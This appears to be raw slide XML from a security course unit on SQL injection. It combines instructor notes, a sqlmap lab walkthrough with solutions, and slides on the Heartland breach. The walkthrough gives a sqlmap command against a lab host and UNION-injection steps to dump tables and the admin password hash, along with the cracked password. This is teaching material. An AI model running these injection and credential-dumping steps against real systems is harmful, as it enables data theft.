            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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2923842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Slack out the instructions in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Activities/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Stu_sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/README.md</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0"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3854686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Review the solutions in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Activities/Stu_Stu_sqlmap/Solved/README.md</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> (duplicated below).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>---</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Navigate to: &lt;http://ptl-544ad5ad-8438986c.libcurl.so/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Then, follow the instructions below.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Browse the site, and look at the URL bars. Find the page that accepts a GET query parameter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - Record this URL when you find it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  &gt; **Solution**: `http://ptl-544ad5ad-8438986c.libcurl.so/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>cat.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>=3`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- In your Docker machine, use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> to test the URL for a SQL injection vulnerability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  &gt; **Solution**: ` </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> -u http://ptl-544ad5ad-8438986c.libcurl.so/cat.php?id=3`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Next, use a UNION-based injection to perform the following tasks, and </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - Grab the database banner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - Dump the database users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - List all available databases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - List the tables of the `photoblog` database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - List the columns of the `users` table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - Dump the `login` and `password` columns of the `users` table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- Record the results of your information gathering below.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - **Banner**</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>    ```bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>    web application technology: PHP 5.6.29, Nginx 1.6.2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>    back-end DBMS: MySQL &gt;= 5.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>    banner:    '5.7.17'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>    ```</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - **User(s)**: `'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>ptl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>'@'%'`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - **Databases**: `photoblog` and `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - **Tables in `photoblog`**: `categories`, `pictures`, and `users`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  - **Columns in `users`**: `id`, `login`, `password`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- How many users are registered on this site? What are their username/passwords hashes?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  &gt; **Solution**: There is one registered user, `admin`. Their password hash is `8efe310f9ab3efeae8d410a8e0166eb2`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- What is the password associated with the hash you dumped?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  &gt; **Solution**: Cracking with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>SQLMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> or simply Googling reveal that the password is `P4ssw0rd`.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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16829170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137190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in addition to dumping data, SQL injection can be used to bypass authentication measures, like login forms; allow attackers to gain root shells on the database server; and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sdelete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/modify sensitive records with or without stealing them (e.g., employee payroll data, etc.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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269438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about the Heartland Payment Systems breach: https://www.forbes.com/sites/davelewis/2015/05/31/heartland-payment-systems-suffers-data-breach/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Excerpted from the article above:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Heartland Payment Systems suffered a data breach on May 8th that affected their payroll customers. This is unfortunate news when you take into account that they analysts were of a mind that the company would be posting a $0.64 earnings per share. The payroll processing company also has product offerings in loyalty cards, mobile payments and payment processing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Heartland Payment systems is a company that started in 1997 and has had a bit of a storied history from the perspective of data security. They had the unfortunate title of falling victim to one of the largest data breaches in recent memory. The company suffered a massive attack against their systems in which attackers made off with as many as 100 million debit and credit cards in 2008.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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95741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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>over 100 million debit/credit card numbers were compromised</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>This resulted in Heartland paying out over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>$140 million</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> in damages.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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34681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Heartland breach was possible largely due to a SQL injection vulnerability (amongst others).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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64138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Emphasize that safe SQL practices prevent these kinds of attacks…but, code that allows a server to talk to a database is complex, and developers often implement it insecurely.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t>Today, we’ll take a look at </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t>How users send data to servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t>How servers use user-submitted data to query the database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t>How users can manipulate the database by submitting SQL (!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t>After that, we’ll discuss common SQL injection techniques and tooling.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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234023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1/2/19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target.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www.db-fiddle.com/f/gAkPEQwVW7EsAnm3xuUJGx/0"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ptl-b1464393-cabeb391.libcurl.so/login.php"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ptl-f99df351-3bdd4c8f.libcurl.so/"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b-fiddle.com/f/upnxDj1JbZyQeG7BKNqAUL/0"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normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The Art &amp; Science of SQL Injection</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&lt;Month Date, Year&gt;</a:t>
            </a:r>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latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Unit 13.1</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latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>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22F2-9D37-E548-B237-043A322674CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL Injections </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58EDA02C-4914-2B4C-9887-63F46A25D656}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="270457" y="1081824"/>
            <a:ext cx="7882944" cy="5109091"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E4B87"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL injections are amongst the most dangerous attacks against web applications because they give attackers full access to an organization's data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1E4B87"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E4B87"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Few vulnerabilities can do as much damage to an organization as a SQL injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1E4B87"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E4B87"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This is why most attackers and penetration testers look for SQL injections early—they're particularly high-yield vulnerabilities.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="169134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04CA53-D9B5-4510-826A-B926528A2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 y="0"/>
            <a:ext cx="9209151" cy="5059973"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22E57102-D437-4D54-983C-C6C1C5103706}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1193511" y="5257800"/>
            <a:ext cx="6756978" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Remember </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Heartland</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Connector 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFEF06D7-C756-4A16-8D18-29D5E6F3ADF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4876800"/>
            <a:ext cx="731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78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04CA53-D9B5-4510-826A-B926528A2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030"/>
            <a:ext cx="9209151" cy="5059973"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22E57102-D437-4D54-983C-C6C1C5103706}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190305" y="5257800"/>
            <a:ext cx="6763390" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>100 million</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> victims do.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Connector 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFEF06D7-C756-4A16-8D18-29D5E6F3ADF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4876800"/>
            <a:ext cx="7315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BFB815D-1D64-4474-8D81-C930C8171D08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="4419600"/>
            <a:ext cx="2895600" cy="29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366983D-91C9-41BB-9172-30C7C8CF9280}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="1143000"/>
            <a:ext cx="6934200" cy="12191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6D1AFDE-E0A4-42F9-8132-65F651383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54969">
            <a:off x="2505228" y="-534954"/>
            <a:ext cx="5565204" cy="4754039"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3115815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F8324C-3288-4A82-AECE-5E9D8696822F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47625" y="4800600"/>
            <a:ext cx="9048750" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Heartland got hit by</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3598D9"/>
              </a:solidFill>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3598DB"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3598D9"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> INJECTION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8B34343-81A7-43E4-A96B-47069D6D0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407408"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1043022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F8324C-3288-4A82-AECE-5E9D8696822F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47625" y="5569803"/>
            <a:ext cx="9048750" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8B041"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>GOOD SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3598DB"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SAFE DATA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
